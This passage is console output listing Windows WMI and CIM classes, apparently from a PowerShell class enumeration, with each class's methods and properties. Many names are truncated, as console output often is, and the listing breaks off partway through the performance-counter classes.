Win32_COMApplicationClasses {} {GroupComponent, PartComponent} Win32_ClassicCOMApplicationClasses {} {GroupComponent, PartComponent} CIM_DirectoryContainsFile {} {GroupComponent, PartComponent} CIM_FileStorage {} {GroupComponent, PartComponent} Win32_UserInDomain {} {GroupComponent, PartComponent} Win32_LoadOrderGroupServiceMembers {} {GroupComponent, PartComponent} CIM_OperatingSystemSoftwareFeature {} {GroupComponent, PartComponent} CIM_RedundancyComponent {} {GroupComponent, PartComponent} CIM_AggregateRedundancyComponent {} {GroupComponent, PartComponent} CIM_PExtentRedundancyComponent {} {GroupComponent, PartComponent} Win32_LogicalDiskRootDirectory {} {GroupComponent, PartComponent} CIM_SoftwareFeatureSoftwareElements {} {GroupComponent, PartComponent} Win32_SoftwareFeatureSoftwareEle... {} {GroupComponent, PartComponent} CIM_VideoBIOSFeatureVideoBIOSEle... {} {GroupComponent, PartComponent} CIM_BIOSFeatureBIOSElements {} {GroupComponent, PartComponent} Win32_MemoryDeviceArray {} {GroupComponent, PartComponent} Win32_GroupInDomain {} {GroupComponent, PartComponent} CIM_OSProcess {} {GroupComponent, PartComponent} Win32_GroupUser {} {GroupComponent, PartComponent} Win32_ProgramGroupContents {} {GroupComponent, PartComponent} Win32_SubDirectory {} {GroupComponent, PartComponent} CIM_Container {} {GroupComponent, LocationWithinContainer, PartComponent} CIM_ConnectorOnPackage {} {GroupComponent, LocationWithinContainer, PartComponent} CIM_PackageInChassis {} {GroupComponent, LocationWithinContainer, PartComponent} CIM_ChassisInRack {} {BottomU, GroupComponent, LocationWithinContainer, PartComponent} CIM_PackagedComponent {} {GroupComponent, LocationWithinContainer, PartComponent} CIM_MemoryOnCard {} {GroupComponent, LocationWithinContainer, PartComponent} Win32_PhysicalMemoryLocation {} {GroupComponent, LocationWithinContainer, PartComponent} CIM_CardOnCard {} {GroupComponent, LocationWithinContainer, MountOrSlotDescription, PartComponent} Win32_FolderRedirectionUserConfi... {} {AppDataRoaming, Contacts, Desktop, Documents...} Win32_Reliability {} {} Win32_ReliabilityStabilityMetrics {GetRecordCount} {EndMeasurementDate, RelID, StartMeasurementDate, SystemStabilityIndex...} Win32_ReliabilityRecords {GetRecordCount} {ComputerName, EventIdentifier, InsertionStrings, Logfile...} Win32_NTLogEventLog {} {Log, Record} Win32_DiskQuota {} {DiskSpaceUsed, Limit, QuotaVolume, Status...} Win32_ComClassAutoEmulator {} {NewVersion, OldVersion} Win32_FolderRedirectionHealthCon... {} {LastSyncDurationCautionInHours, LastSyncDurationUnhealthyInHours} Win32_ComClassEmulator {} {NewVersion, OldVersion} Win32_SoftwareFeatureAction {} {Action, Element} CIM_StatisticalInformation {} {Caption, Description, Name} Win32_NamedJobObjectActgInfo {} {ActiveProcesses, Caption, Description, Name...} CIM_DeviceErrorCounts {ResetCounter} {Caption, CriticalErrorCount, Description, DeviceCreationClassName...} Win32_Perf {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_SecuritySettingGroup {} {Group, SecuritySetting} Win32_LogicalFileGroup {} {Group, SecuritySetting} Win32_DCOMApplicationLaunchAllow... {} {Element, Setting} Win32_SecuritySettingAuditing {} {AuditedAccessMask, GuidInheritedObjectType, GuidObjectType, Inheritance...} Win32_LogicalFileAuditing {} {AuditedAccessMask, GuidInheritedObjectType, GuidObjectType, Inheritance...} Win32_LogicalShareAuditing {} {AuditedAccessMask, GuidInheritedObjectType, GuidObjectType, Inheritance...} SoftwareLicensingProduct {UninstallProduct... {ADActivationCsvlkPid, ADActivationCsvlkSkuId, ADActivationObjectDN, ADActivationObjectName...} CIM_SoftwareElementActions {} {Action, Element} Win32_SoftwareElementAction {} {Action, Element} CIM_Dependency {} {Antecedent, Dependent} CIM_ServiceAccessBySAP {} {Antecedent, Dependent} CIM_BootServiceAccessBySAP {} {Antecedent, Dependent} Win32_ApplicationCommandLine {} {Antecedent, Dependent} CIM_ClusterServiceAccessBySAP {} {Antecedent, Dependent} Win32_SubSession {} {Antecedent, Dependent} Win32_ShadowVolumeSupport {} {Antecedent, Dependent} CIM_SAPSAPDependency {} {Antecedent, Dependent} CIM_PackageTempSensor {} {Antecedent, Dependent} CIM_JobDestinationJobs {} {Antecedent, Dependent} CIM_BIOSLoadedInNV {} {Antecedent, Dependent, EndingAddress, StartingAddress} CIM_AssociatedCooling {} {Antecedent, Dependent} Win32_DeviceBus {} {Antecedent, Dependent} Win32_SessionConnection {} {Antecedent, Dependent} Win32_ShadowFor {} {Antecedent, Dependent} Win32_LogonSessionMappedDisk {} {Antecedent, Dependent} CIM_ConnectedTo {} {Antecedent, Dependent} CIM_SlotInSlot {} {Antecedent, Dependent} Win32_PrinterShare {} {Antecedent, Dependent} CIM_BootOSFromFS {} {Antecedent, Dependent} Win32_PnPSignedDriverCIMDataFile {} {Antecedent, Dependent} CIM_AssociatedAlarm {} {Antecedent, Dependent} CIM_ElementsLinked {} {Antecedent, Dependent} Win32_ConnectionShare {} {Antecedent, Dependent} Win32_LoadOrderGroupServiceDepen... {} {Antecedent, Dependent} CIM_DeviceSAPImplementation {} {Antecedent, Dependent} CIM_AssociatedSensor {} {Antecedent, Dependent} CIM_AssociatedSupplyCurrentSensor {} {Antecedent, Dependent, MonitoringRange} CIM_AssociatedSupplyVoltageSensor {} {Antecedent, Dependent, MonitoringRange} CIM_Mount {} {Antecedent, Dependent} CIM_ComputerSystemPackage {} {Antecedent, Dependent} CIM_PackageCooling {} {Antecedent, Dependent} CIM_ProcessExecutable {} {Antecedent, BaseAddress, Dependent, GlobalProcessCount...} CIM_HostedService {} {Antecedent, Dependent} CIM_HostedBootService {} {Antecedent, Dependent} CIM_DeviceAccessedByFile {} {Antecedent, Dependent} Win32_SessionResource {} {Antecedent, Dependent} Win32_SessionProcess {} {Antecedent, Dependent} CIM_AssociatedMemory {} {Antecedent, Dependent} CIM_AssociatedProcessorMemory {} {Antecedent, BusSpeed, Dependent} Win32_AssociatedProcessorMemory {} {Antecedent, BusSpeed, Dependent} Win32_SoftwareFeatureParent {} {Antecedent, Dependent} CIM_DeviceServiceImplementation {} {Antecedent, Dependent} CIM_AssociatedBattery {} {Antecedent, Dependent} Win32_ShadowOn {} {Antecedent, Dependent} Win32_PrinterDriverDll {} {Antecedent, Dependent} CIM_PackageInSlot {} {Antecedent, Dependent} CIM_CardInSlot {} {Antecedent, Dependent} CIM_MemoryWithMedia {} {Antecedent, Dependent} CIM_ServiceServiceDependency {} {Antecedent, Dependent, TypeOfDependency} Win32_DependentService {} {Antecedent, Dependent, TypeOfDependency} CIM_BasedOn {} {Antecedent, Dependent, EndingAddress, StartingAddress} CIM_LogicalDiskBasedOnPartition {} {Antecedent, Dependent, EndingAddress, StartingAddress} Win32_LogicalDiskToPartition {} {Antecedent, Dependent, EndingAddress, StartingAddress} CIM_LogicalDiskBasedOnVolumeSet {} {Antecedent, Dependent, EndingAddress, StartingAddress} CIM_PSExtentBasedOnPExtent {} {Antecedent, Dependent, EndingAddress, StartingAddress} Win32_OperatingSystemQFE {} {Antecedent, Dependent} Win32_LoggedOnUser {} {Antecedent, Dependent} CIM_RunningOS {} {Antecedent, Dependent} Win32_SystemDriverPNPEntity {} {Antecedent, Dependent} CIM_SoftwareFeatureServiceImplem... {} {Antecedent, Dependent} CIM_ServiceSAPDependency {} {Antecedent, Dependent} Win32_DfsNodeTarget {} {Antecedent, Dependent} Win32_CIMLogicalDeviceCIMDataFile {} {Antecedent, Dependent, Purpose, PurposeDescription} CIM_DeviceConnection {} {Antecedent, Dependent, NegotiatedDataWidth, NegotiatedSpeed} CIM_ControlledBy {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...} Win32_SCSIControllerDevice {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...} Win32_POTSModemToSerialPort {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...} Win32_USBControllerDevice {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...} CIM_SCSIInterface {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...} Win32_PrinterController {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...} Win32_IDEControllerDevice {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...} CIM_SerialInterface {} {AccessState, Antecedent, Dependent, FlowControlInfo...} CIM_USBControllerHasHub {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...} Win32_ControllerHasHub {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...} Win32_1394ControllerDevice {} {AccessState, Antecedent, Dependent, NegotiatedDataWidth...} Win32_DriverForDevice {} {Antecedent, Dependent} Win32_LogicalProgramGroupItemDat... {} {Antecedent, Dependent} CIM_AllocatedResource {} {Antecedent, Dependent} Win32_PNPAllocatedResource {} {Antecedent, Dependent} CIM_SoftwareFeatureSAPImplementa... {} {Antecedent, Dependent} CIM_DeviceSoftware {} {Antecedent, Dependent, Purpose, PurposeDescription} CIM_Realizes {} {Antecedent, Dependent} CIM_RealizesPExtent {} {Antecedent, Dependent, StartingAddress} Win32_DiskDrivePhysicalMedia {} {Antecedent, Dependent} CIM_RealizesDiskPartition {} {Antecedent, Dependent, StartingAddress} Win32_MemoryDeviceLocation {} {Antecedent, Dependent} Win32_MemoryArrayLocation {} {Antecedent, Dependent} CIM_RealizesAggregatePExtent {} {Antecedent, Dependent} Win32_ShadowBy {} {Antecedent, Dependent} Win32_AllocatedResource {} {Antecedent, Dependent} CIM_HostedAccessPoint {} {Antecedent, Dependent} CIM_HostedBootSAP {} {Antecedent, Dependent} CIM_ResidesOnExtent {} {Antecedent, Dependent} CIM_MediaPresent {} {Antecedent, Dependent} Win32_DiskDriveToDiskPartition {} {Antecedent, Dependent} CIM_HostedJobDestination {} {Antecedent, Dependent} Win32_LogicalProgramGroupDirectory {} {Antecedent, Dependent} Win32_ShadowDiffVolumeSupport {} {Antecedent, Dependent} CIM_PackageAlarm {} {Antecedent, Dependent} CIM_Docked {} {Antecedent, Dependent} CIM_Product {} {Caption, Description, IdentifyingNumber, Name...} Win32_Product {Install, Admin, ... {AssignmentType, Caption, Description, HelpLink...} Win32_ComputerSystemProduct {} {Caption, Description, IdentifyingNumber, Name...} CIM_ActionSequence {} {Next, Prior} CIM_CollectedCollections {} {Collection, CollectionInCollection} Win32_ProductCheck {} {Check, Product} SoftwareLicensingService {InstallProductKe... {ClientMachineID, DiscoveredKeyManagementServiceMachineIpAddress, DiscoveredKeyManagementServiceMachineName, DiscoveredKeyManagementServiceMac... Win32_NTLogEventUser {} {Record, User} CIM_ProductParentChild {} {Child, Parent} Win32_ProtocolBinding {} {Antecedent, Dependent, Device} CIM_SupportAccess {} {CommunicationInfo, CommunicationMode, Description, Locale...} CIM_CollectionSetting {} {Collection, Setting} Win32_NamedJobObjectLimit {} {Collection, Setting} Win32_NamedJobObjectSecLimit {} {Collection, Setting} Win32_NTLogEventComputer {} {Computer, Record} Win32_TokenGroups {} {GroupCount, Groups} SoftwareLicensingTokenActivation... {Uninstall} {AdditionalInfo, AuthorizationStatus, Description, ExpirationDate...} CIM_PhysicalCapacity {} {Caption, Description, Name} CIM_MemoryCapacity {} {Caption, Description, MaximumMemoryCapacity, MemoryType...} Win32_DefragAnalysis {} {AverageFileSize, AverageFragmentsPerFile, AverageFreeSpacePerExtent, ClusterSize...} CIM_ProductProductDependency {} {DependentProduct, RequiredProduct, TypeOfDependency} Win32_SIDandAttributes {} {Attributes, SID} Win32_CheckCheck {} {Check, Location} CIM_CompatibleProduct {} {CompatibilityDescription, CompatibleProduct, Product} Win32_RoamingProfileBackgroundUp... {} {Interval, SchedulingMethod, Time} CIM_ToDirectoryAction {} {DestinationDirectory, FileName} CIM_ActsAsSpare {} {Group, HotStandby, Spare} Win32_RoamingProfileSlowLinkParams {} {ConnectionTransferRate, TimeOut} Win32_SecuritySettingAccess {} {AccessMask, GuidInheritedObjectType, GuidObjectType, Inheritance...} Win32_LogicalFileAccess {} {AccessMask, GuidInheritedObjectType, GuidObjectType, Inheritance...} Win32_LogicalShareAccess {} {AccessMask, GuidInheritedObjectType, GuidObjectType, Inheritance...} Win32_OfflineFilesHealth {} {LastSuccessfulSyncTime, LastSyncStatus, LastSyncTime, OfflineAccessEnabled...} CIM_StorageDefect {} {Error, Extent} Win32_PerfFormattedData_ADWS_ADWS {} {ActiveWebServiceSessions, AllocatedConnections, Caption, ChangeOptionalFeatureOperationsPerSecond...} Win32_PerfRawData_ADWS_ADWS {} {ActiveWebServiceSessions, AllocatedConnections, Caption, ChangeOptionalFeatureOperationsPerSecond...} Win32_PerfFormattedData_AFDCount... {} {Caption, Description, DroppedDatagrams, DroppedDatagramsPersec...} Win32_PerfRawData_AFDCounters_Mi... {} {Caption, Description, DroppedDatagrams, DroppedDatagramsPersec...} Win32_PerfFormattedData_Authoriz... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_AuthorizationM... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_BITS_BIT... {} {BITSDownloadBlockSizeBytes, BITSDownloadResponseIntervalmsec, Caption, Description...} Win32_PerfRawData_BITS_BITSNetUt... {} {BITSDownloadBlockSizeBytes, BITSDownloadResponseIntervalmsec, Caption, Description...} Win32_PerfFormattedData_Counters... {} {AAAAqueriesFailed, AAAAqueriesSuccessful, AAAASynthesizedrecords, Caption...} Win32_PerfRawData_Counters_DNS64... {} {AAAAqueriesFailed, AAAAqueriesSuccessful, AAAASynthesizedrecords, Caption...} Win32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_Counters_Event... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_Counters... {} {BufferMemoryUsageNonPagedPool, BufferMemoryUsagePagedPool, Caption, Description...} Win32_PerfRawData_Counters_Event... {} {BufferMemoryUsageNonPagedPool, BufferMemoryUsagePagedPool, Caption, Description...} Win32_PerfFormattedData_Counters... {} {Caption, Description, FileSystemBytesRead, FileSystemBytesWritten...} Win32_PerfRawData_Counters_FileS... {} {Caption, Description, FileSystemBytesRead, FileSystemBytesWritten...} Win32_PerfFormattedData_Counters... {} {AuthIPMainModeNegotiationTime, AuthIPQuickModeNegotiationTime, Caption, Description...} Win32_PerfRawData_Counters_Gener... {} {AuthIPMainModeNegotiationTime, AuthIPQuickModeNegotiationTime, Caption, Description...} Win32_PerfFormattedData_Counters... {} {Caption, CurrentUrisCached, Description, Frequency_Object...} Win32_PerfRawData_Counters_HTTPS... {} {Caption, CurrentUrisCached, Description, Frequency_Object...} Win32_PerfFormattedData_Counters... {} {ArrivalRate, CacheHitRate, Caption, CurrentQueueSize...} Win32_PerfRawData_Counters_HTTPS... {} {ArrivalRate, CacheHitRate, Caption, CurrentQueueSize...} Win32_PerfFormattedData_Counters... {} {AllRequests, BytesReceivedRate, BytesSentRate, BytesTransferredRate...} Win32_PerfRawData_Counters_HTTPS... {} {AllRequests, BytesReceivedRate, BytesSentRate, BytesTransferredRate...} Win32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_Counters_Hyper... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_Counters... {} {Caption, Description, DropsNeighborresolutiontimeouts, ErrorsAuthenticationErrors...} Win32_PerfRawData_Counters_IPHTT... {} {Caption, Description, DropsNeighborresolutiontimeouts, ErrorsAuthenticationErrors...} Win32_PerfFormattedData_Counters... {} {Bytesreceivedonthissession, Bytessentonthissession, Caption, Description...} Win32_PerfRawData_Counters_IPHTT... {} {Bytesreceivedonthissession, Bytessentonthissession, Caption, Description...} Win32_PerfFormattedData_Counters... {} {ActiveExtendedModeSAs, ActiveMainModeSAs, ActiveQuickModeSAs, Caption...} Win32_PerfRawData_Counters_IPsec... {} {ActiveExtendedModeSAs, ActiveMainModeSAs, ActiveQuickModeSAs, Caption...} Win32_PerfFormattedData_Counters... {} {ActiveExtendedModeSAs, ActiveMainModeSAs, ActiveQuickModeSAs, Caption...} Win32_PerfRawData_Counters_IPsec... {} {ActiveExtendedModeSAs, ActiveMainModeSAs, ActiveQuickModeSAs, Caption...} Win32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_Counters_IPsec... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_Counters... {} {Caption, CurrentStateEntries, Description, Frequency_Object...} Win32_PerfRawData_Counters_IPsec... {} {Caption, CurrentStateEntries, Description, Frequency_Object...} Win32_PerfFormattedData_Counters... {} {ActiveSecurityAssociations, BytesReceivedinTransportModePersec, BytesReceivedinTunnelModePersec, BytesSentinTransportModePersec...} Win32_PerfRawData_Counters_IPsec... {} {ActiveSecurityAssociations, BytesReceivedinTransportModePersec, BytesReceivedinTunnelModePersec, BytesSentinTransportModePersec...} Win32_PerfFormattedData_Counters... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...} Win32_PerfRawData_Counters_IPsec... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...} Win32_PerfFormattedData_Counters... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...} Win32_PerfRawData_Counters_IPsec... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...} Win32_PerfFormattedData_Counters... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...} Win32_PerfRawData_Counters_IPsec... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...} Win32_PerfFormattedData_Counters... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...} Win32_PerfRawData_Counters_IPsec... {} {ActiveMainModeSAs, ActiveQuickModeSAs, Caption, Description...} Win32_PerfFormattedData_Counters... {} {Caption, Description, FailedRequests, Frequency_Object...} Win32_PerfRawData_Counters_KPSSVC {} {Caption, Description, FailedRequests, Frequency_Object...} Win32_PerfFormattedData_Counters... {} {AverageSemaphoreHoldTime, Caption, Description, Frequency_Object...} Win32_PerfRawData_Counters_Netlogon {} {AverageSemaphoreHoldTime, AverageSemaphoreHoldTime_Base, Caption, Description...} Win32_PerfFormattedData_Counters... {} {Bytestransmitted, BytestransmittedPersec, Caption, Description...} Win32_PerfRawData_Counters_Netwo... {} {Bytestransmitted, BytestransmittedPersec, Caption, Description...} Win32_PerfFormattedData_Counters... {} {Averagepacketsinnetcard, Averagepacketsinsequencer, Averagepacketsinshaper, Bytesscheduled...} Win32_PerfRawData_Counters_Pacer... {} {Averagepacketsinnetcard, Averagepacketsinsequencer, Averagepacketsinshaper, Bytesscheduled...} Win32_PerfFormattedData_Counters... {} {Averagepacketsinnetcard, Averagepacketsinsequencer, Averagepacketsinshaper, Caption...} Win32_PerfRawData_Counters_Pacer... {} {Averagepacketsinnetcard, Averagepacketsinsequencer, Averagepacketsinshaper, Caption...} Win32_PerfFormattedData_Counters... {} {BuildScatterGatherCyclesPersec, Caption, Description, Frequency_Object...} Win32_PerfRawData_Counters_PerPr... {} {BuildScatterGatherCyclesPersec, Caption, Description, Frequency_Object...} Win32_PerfFormattedData_Counters... {} {BuildScatterGatherListCallsPersec, Caption, Description, DPCsDeferredPersec...} Win32_PerfRawData_Counters_PerPr... {} {BuildScatterGatherListCallsPersec, Caption, Description, DPCsDeferredPersec...} Win32_PerfFormattedData_Counters... {} {Caption, Description, DevicePowerState, Frequency_Object...} Win32_PerfRawData_Counters_Physi... {} {Caption, Description, DevicePowerState, Frequency_Object...} Win32_PerfFormattedData_Counters... {} {ActivityHostManagerhostprocessespoolsize, ActivityHostManagerNumberofbusyhostprocesses, ActivityHostManagerNumberofcreatedhostprocesses, Acti... Win32_PerfRawData_Counters_Power... {} {ActivityHostManagerhostprocessespoolsize, ActivityHostManagerNumberofbusyhostprocesses, ActivityHostManagerNumberofcreatedhostprocesses, Acti... Win32_PerfFormattedData_Counters... {} {AverageIdleTime, C1TransitionsPersec, C2TransitionsPersec, C3TransitionsPersec...} Win32_PerfRawData_Counters_Proce... {} {AverageIdleTime, AverageIdleTime_Base, C1TransitionsPersec, C2TransitionsPersec...} Win32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_Counters_RDMAA... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_Counters... {} {AverageEncodingTime, Caption, Description, FrameQuality...} Win32_PerfRawData_Counters_Remot... {} {AverageEncodingTime, Caption, Description, FrameQuality...} Win32_PerfFormattedData_Counters... {} {BaseTCPRTT, BaseUDPRTT, Caption, CurrentTCPBandwidth...} Win32_PerfRawData_Counters_Remot... {} {BaseTCPRTT, BaseUDPRTT, Caption, CurrentTCPBandwidth...} Win32_PerfFormattedData_Counters... {} {AvgBytesPerRead, AvgBytesPerWrite, AvgDataBytesPerRequest, AvgDataQueueLength...} Win32_PerfRawData_Counters_SMBCl... {} {AvgBytesPerRead, AvgBytesPerRead_Base, AvgBytesPerWrite, AvgBytesPerWrite_Base...} Win32_PerfFormattedData_Counters... {} {BytesRDMAReadPersec, BytesRDMAWrittenPersec, BytesReceivedPersec, BytesSentPersec...} Win32_PerfRawData_Counters_SMBDi... {} {BytesRDMAReadPersec, BytesRDMAWrittenPersec, BytesReceivedPersec, BytesSentPersec...} Win32_PerfFormattedData_Counters... {} {AvgBytesPerRead, AvgBytesPerWrite, AvgDataBytesPerRequest, AvgDataQueueLength...} Win32_PerfRawData_Counters_SMBSe... {} {AvgBytesPerRead, AvgBytesPerRead_Base, AvgBytesPerWrite, AvgBytesPerWrite_Base...} Win32_PerfFormattedData_Counters... {} {AvgBytesPerRead, AvgBytesPerWrite, AvgDataBytesPerRequest, AvgDataQueueLength...} Win32_PerfRawData_Counters_SMBSe... {} {AvgBytesPerRead, AvgBytesPerRead_Base, AvgBytesPerWrite, AvgBytesPerWrite_Base...} Win32_PerfFormattedData_Counters... {} {Caption, Description, ExecResourceAcquiresAcqExclLitePersec, ExecResourceAcquiresAcqShrdLitePersec...} Win32_PerfRawData_Counters_Synch... {} {Caption, Description, ExecResourceAcquiresAcqExclLitePersec, ExecResourceAcquiresAcqShrdLitePersec...} Win32_PerfFormattedData_Counters... {} {Caption, Description, ExecResourceAcquiresAcqExclLitePersec, ExecResourceAcquiresAcqShrdLitePersec...} Win32_PerfRawData_Counters_Synch... {} {Caption, Description, ExecResourceAcquiresAcqExclLitePersec, ExecResourceAcquiresAcqShrdLitePersec...} Win32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_Counters_Tered... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_Counters_Tered... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_Counters_Tered... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_Counters_Therm... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_Counters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_Counters_WFP {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_Counters... {} {ActiveInboundConnections, ActiveOutboundConnections, AllowedClassifiesPersec, BlockedBinds...} Win32_PerfRawData_Counters_WFPv4 {} {ActiveInboundConnections, ActiveOutboundConnections, AllowedClassifiesPersec, BlockedBinds...} Win32_PerfFormattedData_Counters... {} {ActiveInboundConnections, ActiveOutboundConnections, AllowedClassifiesPersec, BlockedBinds...} Win32_PerfRawData_Counters_WFPv6 {} {ActiveInboundConnections, ActiveOutboundConnections, AllowedClassifiesPersec, BlockedBinds...} Win32_PerfFormattedData_Counters... {} {ActiveOperations, ActiveShells, ActiveUsers, Caption...} Win32_PerfRawData_Counters_WSMan... {} {ActiveOperations, ActiveShells, ActiveUsers, Caption...} Win32_PerfFormattedData_Counters... {} {AllocationCount, Caption, Description, FreeCount...} Win32_PerfRawData_Counters_XHCIC... {} {AllocationCount, Caption, Description, FreeCount...} Win32_PerfFormattedData_Counters... {} {Caption, Description, DpcRequeueCount, DPCsPersec...} Win32_PerfRawData_Counters_XHCII... {} {Caption, Description, DpcRequeueCount, DPCsPersec...} Win32_PerfFormattedData_Counters... {} {BytesPerSec, Caption, Description, FailedTransferCount...} Win32_PerfRawData_Counters_XHCIT... {} {BytesPerSec, Caption, Description, FailedTransferCount...} Win32_PerfFormattedData_DdmCount... {} {BytesReceivedByDisconnectedClients, BytesTransmittedByDisconnectedClients, Caption, Description...} Win32_PerfRawData_DdmCounterProv... {} {BytesReceivedByDisconnectedClients, BytesTransmittedByDisconnectedClients, Caption, Description...} Win32_PerfFormattedData_DFSNServ... {} {Caption, Description, FolderCount, Frequency_Object...} Win32_PerfRawData_DFSNServerServ... {} {Caption, Description, FolderCount, Frequency_Object...} Win32_PerfFormattedData_DFSNServ... {} {AvgResponseTime, Caption, Description, Frequency_Object...} Win32_PerfRawData_DFSNServerServ... {} {AvgResponseTime, AvgResponseTime_Base, Caption, Description...} Win32_PerfFormattedData_DFSNServ... {} {AvgResponseTime, Caption, Description, Frequency_Object...} Win32_PerfRawData_DFSNServerServ... {} {AvgResponseTime, AvgResponseTime_Base, Caption, Description...} Win32_PerfFormattedData_dfsr_DFS... {} {BandwidthSavingsUsingDFSReplication, Caption, CompressedSizeofFilesReceived, ConflictBytesCleanedup...} Win32_PerfRawData_dfsr_DFSReplic... {} {BandwidthSavingsUsingDFSReplication, Caption, CompressedSizeofFilesReceived, ConflictBytesCleanedup...} Win32_PerfFormattedData_dfsr_DFS... {} {BandwidthSavingsUsingDFSReplication, BytesReceivedPerSecond, Caption, CompressedSizeofFilesReceived...} Win32_PerfRawData_dfsr_DFSReplic... {} {BandwidthSavingsUsingDFSReplication, BytesReceivedPerSecond, Caption, CompressedSizeofFilesReceived...} Win32_PerfFormattedData_dfsr_DFS... {} {Caption, DatabaseCommits, DatabaseLookups, Description...} Win32_PerfRawData_dfsr_DFSReplic... {} {Caption, DatabaseCommits, DatabaseLookups, Description...} Win32_PerfFormattedData_Director... {} {ABANRPersec, ABBrowsesPersec, ABClientSessions, ABMatchesPersec...} Win32_PerfRawData_DirectoryServi... {} {ABANRPersec, ABBrowsesPersec, ABClientSessions, ABMatchesPersec...} Win32_PerfFormattedData_DNS_DNS {} {AXFRRequestReceived, AXFRRequestSent, AXFRResponseReceived, AXFRSuccessReceived...} Win32_PerfRawData_DNS_DNS {} {AXFRRequestReceived, AXFRRequestSent, AXFRResponseReceived, AXFRSuccessReceived...} Win32_PerfFormattedData_ESENT_Da... {} {Caption, DatabaseCacheMemoryCommitted, DatabaseCacheMemoryCommittedMB, DatabaseCacheMemoryReserved...} Win32_PerfRawData_ESENT_Database {} {Caption, DatabaseCacheMemoryCommitted, DatabaseCacheMemoryCommittedMB, DatabaseCacheMemoryReserved...} Win32_PerfFormattedData_ESENT_Da... {} {Caption, DatabaseCacheMissesPersec, DatabaseCachePercentHit, DatabaseCachePercentHitUncorrelated...} Win32_PerfRawData_ESENT_Database... {} {Caption, DatabaseCacheMissesPersec, DatabaseCachePercentHit, DatabaseCachePercentHit_Base...} Win32_PerfFormattedData_ESENT_Da... {} {Caption, DatabaseCacheMissesPersec, DatabaseCachePercentHit, DatabaseCachePercentHitUncorrelated...} Win32_PerfRawData_ESENT_Database... {} {Caption, DatabaseCacheMissesPersec, DatabaseCachePercentHit, DatabaseCachePercentHit_Base...} Win32_PerfFormattedData_LocalSes... {} {ActiveSessions, Caption, Description, Frequency_Object...} Win32_PerfRawData_LocalSessionMa... {} {ActiveSessions, Caption, Description, Frequency_Object...} Win32_PerfFormattedData_Lsa_Secu... {} {Caption, ContextHandles, CredentialHandles, Description...} Win32_PerfRawData_Lsa_SecurityPe... {} {Caption, ContextHandles, CredentialHandles, Description...} Win32_PerfFormattedData_Lsa_Secu... {} {ActiveSchannelSessionCacheEntries, Caption, Description, DigestAuthentications...} Win32_PerfRawData_Lsa_SecuritySy... {} {ActiveSchannelSessionCacheEntries, Caption, Description, DigestAuthentications...} Win32_PerfFormattedData_MSDTC_Di... {} {AbortedTransactions, AbortedTransactionsPersec, ActiveTransactions, ActiveTransactionsMaximum...} Win32_PerfRawData_MSDTC_Distribu... {} {AbortedTransactions, AbortedTransactionsPersec, ActiveTransactions, ActiveTransactionsMaximum...} Win32_PerfFormattedData_MSDTCBri... {} {Averageparticipantcommitresponsetime, Averageparticipantprepareresponsetime, Caption, CommitretrycountPersec...} Win32_PerfRawData_MSDTCBridge400... {} {Averageparticipantcommitresponsetime, Averageparticipantcommitresponsetime_Base, Averageparticipantprepareresponsetime, Averageparticipantpre... Win32_PerfFormattedData_NETCLRDa... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_NETCLRData_NET... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_NETCLRNe... {} {BytesReceived, BytesSent, Caption, ConnectionsEstablished...} Win32_PerfRawData_NETCLRNetworki... {} {BytesReceived, BytesSent, Caption, ConnectionsEstablished...} Win32_PerfFormattedData_NETCLRNe... {} {BytesReceived, BytesSent, Caption, ConnectionsEstablished...} Win32_PerfRawData_NETCLRNetworki... {} {BytesReceived, BytesSent, Caption, ConnectionsEstablished...} Win32_PerfFormattedData_NETDataP... 